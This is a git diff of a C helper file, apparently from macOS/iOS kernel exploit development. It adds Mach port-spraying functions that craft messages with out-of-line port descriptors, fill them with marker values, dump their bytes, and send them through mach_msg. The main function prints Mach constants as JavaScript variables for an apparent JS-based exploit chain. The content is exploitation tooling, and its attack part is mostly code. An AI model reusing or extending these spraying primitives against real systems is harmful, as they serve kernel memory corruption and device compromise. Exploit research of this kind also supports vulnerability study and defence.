diff options
Diffstat (limited to 'tools/testlol.c')
| -rwxr-xr-x | tools/testlol.c | 80 |
1 files changed, 75 insertions, 5 deletions
diff --git a/tools/testlol.c b/tools/testlol.c index 59b1db9..526895b 100755 --- a/tools/testlol.c +++ b/tools/testlol.c @@ -46,6 +46,67 @@ typedef struct __attribute__((__packed__)) { natural_t ip_sorights;
} kport_t;
+mach_port_t kp = 0;
+mach_port_t spray_ports(mach_msg_type_number_t number_port_descs) {
+ if (!kp) {
+ mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &kp);
+ mach_port_insert_right(mach_task_self(), kp, kp, MACH_MSG_TYPE_MAKE_SEND);
+ }
+
+ mach_port_t mp = 0;
+
+ mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &mp);
+ mach_port_insert_right(mach_task_self(), mp, mp, MACH_MSG_TYPE_MAKE_SEND);
+
+ send_ports(mp, kp, 2, number_port_descs);
+
+ printf("%x %x %x %x\n", mp, kp, 2, number_port_descs);
+
+ return mp;
+}
+
+kern_return_t send_ports(mach_port_t target, mach_port_t payload, size_t num, mach_msg_type_number_t number_port_descs)
+{
+ mach_port_t init_port_set[num];
+ for(size_t i = 0; i < num; ++i)
+ {
+ init_port_set[i] = payload;
+ }
+
+ typedef struct {
+ mach_msg_header_t Head;
+ mach_msg_body_t msgh_body;
+ mach_msg_ool_ports_descriptor_t init_port_set[0];
+ } Request;
+
+ char buf[sizeof(Request) + number_port_descs*sizeof(mach_msg_ool_ports_descriptor_t)];
+ Request *InP = (Request*)buf;
+
+ InP->msgh_body.msgh_descriptor_count = number_port_descs;
+ for (int i = 0; i < 2; i++) {
+ InP->init_port_set[i].address = (void *)0x41424344;
+ InP->init_port_set[i].count = 0x45464748;
+ InP->init_port_set[i].disposition = 0x53;
+ InP->init_port_set[i].deallocate = 0x51;
+ InP->init_port_set[i].type = 0x54;
+ }
+
+ InP->Head.msgh_bits = 0x494a4b4c;
+ /* msgh_size passed as argument */
+ InP->Head.msgh_remote_port = 0x4d4e4f50;
+ InP->Head.msgh_local_port = 0x51525354;
+ InP->Head.msgh_id = 0x55565758;
+
+ for (int i = 0; i < (sizeof(Request) + number_port_descs * sizeof(mach_msg_ool_ports_descriptor_t)); i++) {
+ printf("0x%02x,", ((uint8_t*)(buf))[i]);
+ }
+ printf("\n");
+
+ int ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request)+number_port_descs*sizeof(mach_msg_ool_ports_descriptor_t), 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ printf("%d %s\n", ret, mach_error_string(ret));
+ return ret;
+}
+
int main(int argc, char* argv[]) {
printf("var MACH_PORT_RIGHT_RECEIVE = 0x%x;\n", MACH_PORT_RIGHT_RECEIVE);
printf("var MACH_MSG_TYPE_MAKE_SEND = 0x%x;\n", MACH_MSG_TYPE_MAKE_SEND);
@@ -97,13 +158,22 @@ int main(int argc, char* argv[]) { printf("var MIG_MAX = 0x%x\n", 0x1000);
printf("var NDR_record = %x %x %x %x\n", NDR_record);
- int number_port_descs = 1;
+// spray_ports(2);
- char buf[sizeof(Request) + number_port_descs*sizeof(mach_msg_ool_ports_descriptor_t)];
- Request *InP = (Request*)buf;
+ printf("%x\n", MACH_RCV_MSG);
+
+/*
+ for (int i = 0; i < (sizeof(Request) + number_port_descs * sizeof(mach_msg_ool_ports_descriptor_t)); i++) {
+ printf("0x%02x,", ((uint8_t*)(buf))[i]);
+ }
+ printf("\n");
+
+ int ret = mach_msg(buf, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);*/
+//
+// printf("%d %s\n", ret, mach_error_string(ret));
- printf("%p %p %x %x\n", buf, &InP->Head, sizeof(Request), sizeof(mach_msg_ool_ports_descriptor_t));
- printf("%x %x %x %x %x %x %x %x %x\n", &InP->Head, MACH_SEND_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request)+number_port_descs*sizeof(mach_msg_ool_ports_descriptor_t), 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL, 0x41414141);
+ // printf("%p %p %x %x\n", buf, &InP->Head, sizeof(Request), sizeof(mach_msg_ool_ports_descriptor_t));
+ // printf("%x %x %x %x %x %x %x %x %x\n", &InP->Head, MACH_SEND_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request)+number_port_descs*sizeof(mach_msg_ool_ports_descriptor_t), 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL, 0x41414141);
return 0;
}
|